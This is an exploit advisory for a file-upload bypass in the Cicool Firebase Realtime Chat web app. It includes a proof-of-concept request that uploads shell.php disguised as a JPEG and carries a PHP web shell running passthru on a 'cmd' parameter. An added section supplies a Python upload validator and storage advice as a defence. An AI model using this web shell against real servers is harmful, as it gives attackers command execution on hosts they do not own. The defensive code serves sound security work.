[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Title : Cicool - Firebase Realtime Chat upload shell bypass
[+] Author :
[+] Team: VHB Group
[+] Tested on : Windows 10/Linux
[+] Home Page: https://codecanyon.net/item/cicool-firebase-realtime-chat/24842321
[+]
[+] Demo : https://cicool.go-moment.com/version/v3//uploads/chat/20191021151333-2019-10-21chat151329.html
POC
Modify the request with Burp Suite: go to the chat page and edit the upload information as follows.
Content-Disposition: form-data; name="qqfile"; filename="shell.php"
Content-Type: image/jpeg
ÿØÿà
<form action="" method="get">
Command: <input type="text" name="cmd" /><input type="submit" value="Exec" />
</form>
Output:<br />
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre>
-----------------------------307831217212391--
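
Added example (not part of the original advisory or of the product's code): a server-side check that rejects the request above because it decides on the file name's extension rather than on the client-supplied Content-Type or the leading JPEG bytes. The images-only policy and the names `check_upload`, `ALLOWED` and `SAMPLES` are assumptions made for illustration.

```python
import os
import secrets

# Assumed policy: the chat attachment endpoint accepts images only.
# Maps each permitted extension to the signature its content must start with.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}

def check_upload(filename, declared_type, body):
    """Return (accepted, reason, stored_name) for one multipart file part.

    declared_type is the part's Content-Type header. It is client-supplied,
    so it is accepted as a parameter but never consulted for the decision.
    """
    # Drop any directory components, then decide on the final extension:
    # that is what the web server uses to pick a handler.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return False, "extension %r is not on the allow-list" % ext, None
    # Leading bytes must agree with the extension. On their own they prove
    # nothing, which is why this check comes second, not first.
    if not body.startswith(ALLOWED[ext]):
        return False, "content does not match %s" % ext, None
    # Never reuse the client's name on disk.
    return True, "ok", secrets.token_hex(16) + ext

# Constructed sample parts (payload bytes are placeholders).
JPEG = b"\xff\xd8\xff\xe0"
SAMPLES = [
    ("shell.php", "image/jpeg", JPEG + b"<placeholder>"),  # the request above
    ("note.html", "text/html", b"<html></html>"),
    ("photo.jpg", "image/jpeg", JPEG + b"\x00" * 16),
]

if __name__ == "__main__":
    for name, ctype, data in SAMPLES:
        print(name, ctype, check_upload(name, ctype, data)[:2])
```

Accepted files should also be stored outside the web root, or in a directory where script execution is disabled, so that a gap in this check does not lead to code execution.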